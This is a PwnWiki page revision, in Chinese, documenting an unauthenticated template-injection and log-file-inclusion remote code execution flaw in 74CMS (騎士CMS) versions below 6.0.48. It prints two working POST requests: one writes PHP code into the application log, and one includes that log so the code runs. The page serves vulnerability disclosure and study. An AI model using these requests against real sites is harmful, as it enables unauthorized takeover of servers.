Difference between revisions of "騎士CMS模版註入 &文件包含getshell漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞描述== </translate> <translate> 騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞描述==
+
==漏洞描述== <!--T:1-->
 
</translate>
 
</translate>
 
<translate>
 
<translate>
 +
<!--T:2-->
 
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。
 
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。
  
 +
<!--T:3-->
 
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
 
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==影響範圍==
+
==影響範圍== <!--T:4-->
 
</translate>
 
</translate>
 
<translate>
 
<translate>
 +
<!--T:5-->
 
騎士 CMS < 6.0.48
 
騎士 CMS < 6.0.48
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:6-->
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:7-->
 
使用火狐hackbar發送POST:
 
使用火狐hackbar發送POST:
 
</translate>
 
</translate>
Line 33: Line 37:
  
 
<translate>
 
<translate>
 +
<!--T:8-->
 
可以看到日誌記錄。
 
可以看到日誌記錄。
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:9-->
 
包含這條日誌,注意路徑和日誌名稱:
 
包含這條日誌,注意路徑和日誌名稱:
 
</translate>
 
</translate>

Latest revision as of 14:53, 25 June 2021

Other languages:

漏洞描述

騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。

騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。

影響範圍

騎士 CMS < 6.0.48

漏洞利用

使用火狐hackbar發送POST:

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>


可以看到日誌記錄。

包含這條日誌,注意路徑和日誌名稱:

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log